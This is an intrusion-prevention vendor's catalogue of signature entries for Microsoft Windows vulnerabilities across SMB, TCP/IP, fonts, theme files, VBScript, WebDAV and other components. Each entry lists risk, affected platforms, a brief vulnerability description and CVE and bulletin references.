A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows Vista; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

NetBIOS-TCP_SMB2-Microsoft-Windows-SMB2-Write-CVE-2011-1267
NetBIOS-TCP_SMB-Microsoft-Windows-SMB-DOS-CVE-2011-1267

References:

CVE-2011-1267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1267

MS11-048
http://technet.microsoft.com/security/bulletin/MS11-048

Microsoft-Windows-Smbv1-CVE-2017-0147-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-901-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Improper validation of SMBv1 messages causes an information disclosure vulnerability in Windows. A remote attacker can use a crafted SMB message to gain access to information on the server.

Situation:

SMB-TCP_CHS-Microsoft-Windows-Smbv1-CVE-2017-0147-Information-Disclosure

References:

CVE-2017-0147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147

Microsoft-Windows-SMBv2-Smb2updateleasefilename-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1163-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

Improper handling of SMBv2 requests causes a vulnerability in Windows. A successful exploit may allow an attacker to execute code on the target system.

Situation:

SMB-TCP_CHS-Microsoft-Windows-SMBv2-Smb2updateleasefilename-Code-Execution

References:

CVE-2019-0630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0630

Microsoft-Windows-SMBv3-Compression-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1260-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An information disclosure vulnerability has been reported in the SMBv3 component of Microsoft Windows SMB. The vulnerability is due to improper handling of compressed SMB v3 packets. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted SMBv3 packets to exploit a server. Successful exploitation results in the disclosure of information which could be used to obtain information to further compromise the user's system.

Situation:

SMB-TCP_Microsoft-Windows-SMBv3-Compression-Information-Disclosure

References:

CVE-2020-1206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1206

ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun

Microsoft-Windows-SMTP-Service-DNS-Response-Spoofing

About this vulnerability:

A vulnerability in Microsoft Exchange Server

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a spoofing vulnerability in Microsoft Windows Simple Mail Transfer Protocol (SMTP) Service. The vulnerability is due to insufficient validation of DNS responses to queries made by the SMTP service. Successful exploitation of this vulnerability could allow remote unauthenticated attackers to cause redirection of email traffic.

Situation:

DNS-UDP_Microsoft-Windows-SMTP-Service-DNS-Response-Spoofing
DNS-UDP_Microsoft-Windows-SMTP-Service-DNS-Response-Spoofing-2

References:

CVE-2010-1690
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1690

BID-39910
http://www.securityfocus.com/bid/39910

MS10-024
http://technet.microsoft.com/security/bulletin/MS10-024

Microsoft-Windows-SMTP-Service-MX-Record-Denial-Of-Service

About this vulnerability:

An attempt to exploit vulnerability in Windows SMTP service detected

Risk:

Moderate

First detected in:

sgpkg-ips-394-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003; Windows 2008

Software:

Exchange Server 2000; Exchange Server 2003

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in Microsoft Windows Simple Mail Transfer Protocol (SMTP) service. The vulnerability is due to a memory access error when handling DNS Mail Exchanger (MX) resource records. An attacker can exploit this vulnerability by sending a specifically crafted response to an MX resource record query.

Situation:

DNS-UDP_Microsoft-Windows-SMTP-Service-MX-Record-Denial-Of-Service

References:

CVE-2010-0024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0024

OSVDB-63738
http://www.osvdb.org/63738

MS10-024
http://technet.microsoft.com/security/bulletin/MS10-024

Microsoft-Windows-SNMP-CVE-2018-0967-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1121-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in the SNMP Service of Microsoft Windows. The vulnerability is due to improper handling of malformed SNMP traps. A remote attacker could exploit this vulnerability by sending specially crafted SNMP traps to the target system. Successful exploitation could result in denial of service conditions.

Situation:

SNMP-UDP_Microsoft-Windows-SNMP-CVE-2018-0967-Denial-Of-Service

References:

CVE-2018-0967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0967

ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct

Microsoft-Windows-Ssl-And-Tls-Security-Feature-Bypass

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-505-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a security feature bypass vulnerability in Microsoft Windows. The vulnerability is caused by the way that Windows handles SSL/TLS session version negotiation. By injecting malformed traffic into an SSL version 3 or TLS session, a man-in-the-middle attacker can exploit this vulnerability to silently downgrade the connection to SSL version 2.

Situation:

TLS_SSL-2-0

References:

CVE-2013-0013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0013

BID-57144
http://www.securityfocus.com/bid/57144

OSVDB-88967
http://www.osvdb.org/88967

MS13-006
http://technet.microsoft.com/security/bulletin/MS13-006

Microsoft-Windows-StructuredQuery-RCE-Vulnerability-CVE-2018-0825

About this vulnerability:

A vulnerability in Microsoft Internet Explorer 11

Risk:

High

First detected in:

sgpkg-ips-1043-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

There has been reported an integer overflow in the StructuredQuery.dll. A remote attacker could exploit this vulnerability by having a target user receive a maliciously crafted .lnk file to the target system. Successful exploitation could lead to remote code execution.

Situation:

File-Binary_Microsoft-Windows-StructuredQuery-RCE-Vulnerability-CVE-2018-0825

References:

CVE-2018-0825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0825

ms18-feb
http://technet.microsoft.com/security/bulletin/ms18-feb

Microsoft-Windows-StructuredQuery-Uninitialized-Pointer-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1105-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Improper handling of LNK files causes an uninitialized pointer vulnerability in Windows. A successful exploit may allow an attacker to run code on the target system.

Situation:

File-Binary_Microsoft-Windows-StructuredQuery-Uninitialized-Pointer-Remote-Code-Execution

References:

CVE-2018-8345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8345

Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1491-5242

Last changed:

sgpkg-ips-1500-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A directory traversal vulnerability CVE-2022-34713 has been reported in Microsoft Windows Support Diagnostic Tool. The vulnerability is due to improper validation of ".diagcab" files. A remote attacker could exploit this vulnerability by enticing a user into opening a crafted ".diagcab" file. Successful exploitation could allow the attacker to execute arbitrary code under the context of the user.

Situation:

SMB-TCP_SS-Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713
SMB-TCP_SS-Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713-2
File-TextId_Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713

References:

CVE-2022-34713
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34713

ms22-aug
http://technet.microsoft.com/security/bulletin/ms22-aug

Microsoft-Windows-TCP-FIN-WAIT-Vulnerability

About this vulnerability:

Vulnerability in Windows TCP/IP could allow Denial Of Service

Risk:

Moderate

First detected in:

sgpkg-ips-509-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Windows TCP/IP that could allow Denial Of Service.

Situation:

TCP_Window-Shrinked

References:

CVE-2013-0075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0075

MS13-018
http://technet.microsoft.com/security/bulletin/MS13-018

Microsoft-Windows-TCP-IP-Stack-Url-Based-Qos-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A denial of service vulnerability exists in Microsoft Windows TCP/IP stack URL based Quality of Service (QoS). When URL based QoS in enabled on a machine that is also hosting web content, the TCP/IP stack fails to properly handle long URLs in memory. A remote unauthenticated attacker can exploit this vulnerability by sending network traffic with specially crafted URLs to a vulnerable service. Successful exploitation could cause the affected machine to become non-responsive and restart.

Situation:

HTTP_CSU-Microsoft-Windows-TCP-IP-Stack-Url-Based-Qos-Denial-Of-Service

References:

CVE-2011-1965
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1965

BID-48990
http://www.securityfocus.com/bid/48990

MS11-064
http://technet.microsoft.com/security/bulletin/MS11-064

Microsoft-Windows-TCP-Stack-Zero-Window-Size-Vulnerability

About this vulnerability:

A Microsoft Windows TCP Stack Zero Window Size vulnerability

Risk:

High

First detected in:

sgpkg-ips-1008-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Server

Type:

Malfunction

Description:

A vulnerability in Microsoft Windows which allows remote attackers to cause a denial of service condition by flooding a host with a large number of TCP connections and keeping these connections alive, due to the way the vulnerable product handles an excessive number of established TCP connections.

Situation:

HTTP_CS-Microsoft-Windows-TCP-Stack-Zero-Window-Size-Vulnerability

References:

CVE-2008-4609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4609

Microsoft-Windows-Telnet-Credential-Reflection-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-255-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is an authentication reflection vulnerability in Telnet implementation included within Microsoft Windows. The vulnerability exists because Telnet does not correctly opt-in to NTLM credential-reflection protection methods to ensure that a user's credentials are not reflected back and used against the user. Remote attackers could exploit this vulnerability by persuading a target user to connect to a malicious Telnet server and reflecting the user credentials back to certain services, typically SMB, on the target. Successful exploitation could result in execution of arbitrary code on the vulnerable system in the context of the target user.

Situation:

Analyzer_Telnet-SMB-Bidirectional-Authentication
Telnet_CCS-NTLM-Authentication-Usage

References:

CVE-2009-1930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1930

BID-35993
http://www.securityfocus.com/bid/35993

OSVDB-56904
http://www.osvdb.org/56904

MS09-042
http://technet.microsoft.com/security/bulletin/MS09-042

Microsoft-Windows-Themes-CVE-2024-38030-NTLM-Relay

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1757-5242

Last changed:

sgpkg-ips-1757-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An information disclosure vulnerability has been reported in Microsoft Windows. The vulnerability is due to improper validation of multiple fields within ".theme" files. A remote attacker could exploit this vulnerability by enticing a target user in to downloading a crafted Theme file. Successful exploitation could result in the disclosure of a targeted user's NTLM hashes.

Situation:

File-Text_Microsoft-Windows-Themes-CVE-2024-38030-NTLM-Relay

References:

CVE-2024-38030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38030

ms24-jul
http://technet.microsoft.com/security/bulletin/ms24-jul

Microsoft-Windows-Themes-CVE-2025-21308-NTLM-Relay

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1834-5242

Last changed:

sgpkg-ips-1834-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Improper validation of the Path field within ".theme" files causes an NTLM relay vulnerability in various versions of Windows. A successful exploitation may lead to the disclosure of NTLM hashes.

Situation:

File-Text_Microsoft-Windows-Themes-CVE-2025-21308-NTLM-Relay

References:

CVE-2025-21308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21308

Microsoft-Windows-Themes-Reviseversionifnecessary-Race-Condition

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1650-5242

Last changed:

sgpkg-ips-1650-5242

Platform:

Windows

Software:

<os>

Type:

Race Condition

Description:

A race condition vulnerability exists in Microsoft Windows. The vulnerability is due to a Time-of-check Time-of-use (TOCTOU) bug in the signature validation process for a DLL library loaded while opening a ".theme" or ".themepack" file. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted Theme file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.

Situation:

SMB-TCP_CHS-Microsoft-Windows-Themes-Race-Condition

References:

CVE-2023-38146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38146

ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep

Microsoft-Windows-TLS-Key-Exchange-Denial-Of-Service

About this vulnerability:

A vulnerability in the Microsoft Windows TLS library.

Risk:

High

First detected in:

sgpkg-ips-1378-5242

Last changed:

sgpkg-ips-1378-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in the Microsoft Windows TLS library, multiple versions, which allows remote attackers to cause a denial of service condition by sending crafted Key Exchange messages to the server during a TLS handshake, due to improper handling of certain key exchanges in TLS.

Situation:

Generic_CS-Microsoft-Windows-TLS-Key-Exchange-Denial-Of-Service
TLS_SS-Microsoft-Windows-TLS-Key-Exchange-Denial-Of-Service

References:

CVE-2020-1118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1118

Microsoft-Windows-TPC-IP-Denial-Of-Service-CVE-2020-16899

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Critical

First detected in:

sgpkg-ips-1287-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A denial of service vulnerability exists in the Windows TCP/IP stack. A successful exploitation of this vulnerability can lead to a target system to stop responding.

Situation:

IPv6_Microsoft-Windows-TPC-IP-Denial-Of-Service-CVE-2020-16899

References:

CVE-2020-16899
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16899

ms20-oct
http://technet.microsoft.com/security/bulletin/ms20-oct

Microsoft-Windows-TPC-IP-Remote-Code-Execution-CVE-2020-16898

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Critical

First detected in:

sgpkg-ips-1287-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

A remote code execution vulnerability exists in the Windows TCP/IP stack. A successful exploitation of this vulnerability can lead to arbitrary code execution on the target server or client.

Situation:

IPv6_Microsoft-Windows-TPC-IP-Remote-Code-Execution-CVE-2020-16898

References:

CVE-2020-16898
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16898

ms20-oct
http://technet.microsoft.com/security/bulletin/ms20-oct

Microsoft-Windows-TrueType-Font-File-Parsing-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-973-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Integer Overflow

Description:

There exists a code execution vulnerability in Microsoft Windows.

Situation:

File-Binary_Microsoft-Windows-TrueType-Font-File-Parsing-Remote-Code-Execution

References:

CVE-2015-0059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0059

BID-72470
http://www.securityfocus.com/bid/72470

OSVDB-118179
http://www.osvdb.org/118179

MS15-010
http://technet.microsoft.com/security/bulletin/MS15-010

Microsoft-Windows-TrueType-Font-Parsing-CVE-2011-3402

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-421-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

File-Binary_Microsoft-Windows-TrueType-Font-Parsing-CVE-2011-3402

References:

CVE-2011-3402
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3402

MS11-087
http://technet.microsoft.com/security/bulletin/MS11-087

Microsoft-Windows-Type1-Font-Parsing-Remote-Code-Execution

About this vulnerability:	A vulnerability in Microsoft Windows
Risk:	Moderate
First detected in:	sgpkg-ips-1235-5242
Last changed:	sgpkg-ips-1408-5242
Platform:	Windows
Software:	<os>
Type:	Buffer Overflow
Description:	An attempt to exploit a vulnerability in the font library of Microsoft Windows. This situation also covers the vulnerability CVE-2020-0938.
Situation:	File-TextId_Microsoft-Windows-Type1-Font-Parsing-Remote-Code-Execution-2 File-TextId_Microsoft-Windows-Type1-Font-Parsing-Remote-Code-Execution-1

Microsoft-Windows-Uniscribe-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-836-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Server

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in Microsoft Windows Uniscribe component. The vulnerability is due to improper handling of Format 14 cmap subtable in font files. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted web page or document. Successful exploitation could result in arbitrary code execution under the security context of the logged in user.

Situation:

File-Binary_Microsoft-Windows-Uniscribe-Integer-Overflow

References:

CVE-2016-7274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7274

MS16-147
http://technet.microsoft.com/security/bulletin/MS16-147

Microsoft-Windows-UPnP-Service-Remote-Code-Execution

About this vulnerability:

Buffer overflow vulnerability in Microsoft Windows Unversal Plug and Play service

Risk:

High

First detected in:

sgpkg-ips-102-1314

Last changed:

sgpkg-ips-1589-5242

Platform:

Windows XP SP2; Windows XP 64-bit SP0; Windows XP 64-bit SP2

Software:

<os>

Type:

Buffer Overflow

Description:

There is a memory corruption vulnerability in the Microsoft Windows Universal Plug and Play service. The vulnerability is due to a failure to handle specially crafted HTTP requests. A remote attacker can exploit this vulnerability to cause a denial of service condition, or inject and execute arbitrary code on the target system with the privileges of the Local Service account.

Situation:

HTTP_CS-Microsoft-Windows-UPnP-Service-Remote-Code-Execution

References:

CVE-2007-1204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1204

BID-23371
http://www.securityfocus.com/bid/23371

OSVDB-34010
http://www.osvdb.org/34010

MS07-019
http://technet.microsoft.com/security/bulletin/MS07-019

Microsoft-Windows-URI-Handler-Remote-Code-Execution

About this vulnerability:	An attempt to exploit a vulnerability in Microsoft Windows detected
Risk:	High
First detected in:	sgpkg-ips-1412-5242
Last changed:	sgpkg-ips-1412-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	An attempt to exploit a vulnerability in Microsoft Windows detected.
Situation:	File-Text_Microsoft-Windows-URI-Handler-Remote-Code-Execution

Microsoft-Windows-VBScript-Engine-Dynamic-Array-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-1096-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There has been reported a memory corruption vulnerability in the Microsoft Windows VBScript engine. Successful exploitation could lead to arbitrary code execution.

Situation:

File-Text_Microsoft-Windows-VBScript-Engine-Dynamic-Array-Use-After-Free

References:

CVE-2018-8373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8373

Microsoft-Windows-VBScript-Engine-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-696-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

An information disclosure vulnerability exists in the Microsoft's VBScript engine. The vulnerability is due an error in processing certain types of script code, allowing a user to disclose memory contents of the current process. By enticing a user to open a web page, an attacker could exploit this vulnerability to bypass the ASLR security feature which can be used to facilitate further attacks.

Situation:

File-Text_Microsoft-Windows-VBScript-Regular-Expression-Information-Disclosure

References:

CVE-2015-6052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6052

MS15-106
http://technet.microsoft.com/security/bulletin/MS15-106

Microsoft-Windows-VBScript-Help-File-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-290-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Windows.

Situation:

HTTP_SS-Microsoft-Windows-VBScript-Help-File-Code-Execution
HTTP_SS-Microsoft-Windows-VBScript-Help-File-Code-Execution-2
File-Text_Microsoft-Windows-VBScript-Help-File-Code-Execution
File-Text_Microsoft-Windows-VBScript-Help-File-Code-Execution-2

References:

CVE-2010-0483
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0483

BID-38463
http://www.securityfocus.com/bid/38463

OSVDB-62632
http://www.osvdb.org/62632

MS10-022
http://technet.microsoft.com/security/bulletin/MS10-022

Microsoft-Windows-VBScript-Regular-Expression-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-648-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

An information disclosure vulnerability exists in the Microsoft's VBScript engine. The vulnerability is due an error while processing regular expressions which allows a user to disclose memory contents of the current process. By enticing a user to open a web page, an attacker could exploit this vulnerability to bypass the ASLR security feature which can be used to facilitate further attacks.

Situation:

File-Text_Microsoft-Windows-VBScript-Regular-Expression-Information-Disclosure

References:

CVE-2015-1684
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1684

MS15-053
http://technet.microsoft.com/security/bulletin/MS15-053

Microsoft-Windows-Vista-Contacts-Gadget-Code-Execution

About this vulnerability:

A vulnerability in Windows Vista

Risk:

High

First detected in:

sgpkg-ips-581-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista

Software:

<os>

Type:

Input Validation

Description:

A code execution vulnerability exists in Windows Vista Contacts Gadget that could allow an attacker to run code with the privileges of the logged on user.

Situation:

File-TextId_Microsoft-Windows-Vista-Contacts-Gadget-Code-Execution

References:

CVE-2007-3032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3032

BID-25304
http://www.securityfocus.com/bid/25304

MS07-048
http://technet.microsoft.com/security/bulletin/MS07-048

Microsoft-Windows-Vista-Feed-Headlines-Gadget-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-582-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista

Software:

<os>

Type:

Input Validation

Description:

There exists a cross site scripting vulnerability in Microsoft Windows Vista Feed Headlines gadget. The vulnerability is caused due to lack of input validation when parsing RSS feeds. A remote attacker can exploit this vulnerability by convincing a target user to subscribe to a malicious RSS feed, potentially causing arbitrary code to be injected and executed in the security context of the currently logged in user. In a successful attack scenario, the attacker can inject Javascript code that will download and execute a malicious binary. The behaviour of the system is dependent on the nature of the executed code that would execute in the security context of the currently logged in user.

Situation:

File-TextId_Microsoft-Windows-Vista-Feed-Headlines-Gadget-Code-Execution

References:

CVE-2007-3033
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3033

BID-25287
http://www.securityfocus.com/bid/25287

MS07-048
http://technet.microsoft.com/security/bulletin/MS07-048

Microsoft-Windows-Vista-Windows-Mail-File-Execution

About this vulnerability:

A vulnerability in Microsoft Windows Mail

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows Mail product. The vulnerability is due to insufficient validation of URLs in incoming emails. A remote attacker can exploit this vulnerability by enticing a target user to open an email message and click on a specially crafted URL within the message which refers to an executable file on the client system. Successful exploitation would allow for arbitrary command execution with the privileges of the currently logged-in user. The vulnerable program (Windows Mail) may not show any abnormal behaviour when this vulnerability is triggered. The behaviour of the target host, however, is entirely dependent on the intended function of the executed file. The file in such a case would execute within the security context of the current user.

Situation:

File-Text_Microsoft-Windows-Vista-Windows-Mail-File-Execution

References:

CVE-2007-1658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1658

BID-23103
http://www.securityfocus.com/bid/23103

MS07-034
http://technet.microsoft.com/security/bulletin/MS07-034

Microsoft-Windows-Vulnerability-CVE-2017-0016

About this vulnerability:

Detected an attempt to exploit a vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-851-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A DoS vulnerability in Microsoft Windows.

Situation:

NetBIOS-TCP_Microsoft-Windows-Vulnerability-CVE-2017-0016
Generic_CS-Microsoft-Windows-Vulnerability-CVE-2017-0016
SMB-TCP_SHS-SMB2-Tree-Connect-Response-Too-Long

References:

CVE-2017-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0016

Microsoft-Windows-Vulnerability-CVE-2020-17140

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1301-5242

Last changed:

sgpkg-ips-1301-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An information disclosure vulnerability has been reported in the SMBv2 component of Microsoft Windows SMB. Successful exploitation results in the disclosure of information which could be used to obtain information to further compromise the user's system.

Situation:

SMB-TCP_Microsoft-Windows-Vulnerability-CVE-2020-17140

References:

CVE-2020-17140
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17140

ms20-dec
http://technet.microsoft.com/security/bulletin/ms20-dec

Microsoft-Windows-Wab32res.dll-Insecure-Library-Loading

About this vulnerability:	A vulnerability in Microsoft Windows
Risk:	Moderate
First detected in:	sgpkg-ips-415-4219
Last changed:	sgpkg-ips-1638-5242
Platform:	Windows
Software:	<os>
Type:	Malfunction
Description:	An insecure library loading vulnerability has been reported in Microsoft Windows. The vulnerability is due to a design weakness exhibited during DLL loading. A remote attacker could exploit this vulnerability by enticing a target user to open a crafted file from an SMB or a WebDAV share. A successful attack could result in the execution of arbitrary code in the security context of the target user. Microsoft has not released an advisory or patch for this vulnerability.
Situation:	HTTP_CSU-Microsoft-Windows-Address-Book-Insecure-Library-Loading-CVE-2010-3147 SMB-TCP_Microsoft-Windows-Wab32res.dll-Insecure-Library-Loading

Microsoft-Windows-WebDAV-Mini-Redirector-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Microsoft Windows WebDAV Mini-Redirector

Risk:

Moderate

First detected in:

sgpkg-ips-142-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Windows WebDAV Mini-Redirector

Type:

Buffer Overflow

Description:

The Microsoft Windows WebDAV Mini-Redirector suffers from a remote code execution vulnerability. If a WebDAV server response contains a sufficiently long resource name string, an integer overflow may occur in the validation of the field's length. This leads to the field name being copied into a buffer that is 0x208 bytes long, resulting in a buffer overflow. The vulnerability can be used to execute arbitrary code, or to cause a kernel-level exception and crash Windows.

Situation:

HTTP_SS-Microsoft-Windows-WebDAV-Mini-Redirector-Buffer-Overflow
File-TextId_Microsoft-Windows-WebDAV-Mini-Redirector-Buffer-Overflow

References:

CVE-2008-0080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0080

BID-27670
http://www.securityfocus.com/bid/27670

MS08-007
http://technet.microsoft.com/security/bulletin/MS08-007

Microsoft-Windows-WebDav-Mini-Redirector-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-604-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows Vista; Windows 2003

Software:

<os>

Type:

Integer Overflow

Description:

A vulnerability has been reported in the WebDAV Mini-Redirector component of Microsoft Windows. The flaw can be triggered during the processing of WebDAV responses, causing a heap overflow. An attacker can exploit this vulnerability by persuading the target user to connect to a malicious WebDAV server.

Situation:

File-TextId_Microsoft-Windows-WebDav-Mini-Redirector-Heap-Buffer-Overflow

References:

CVE-2008-0080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0080

BID-27670
http://www.securityfocus.com/bid/27670

MS08-007
http://technet.microsoft.com/security/bulletin/MS08-007

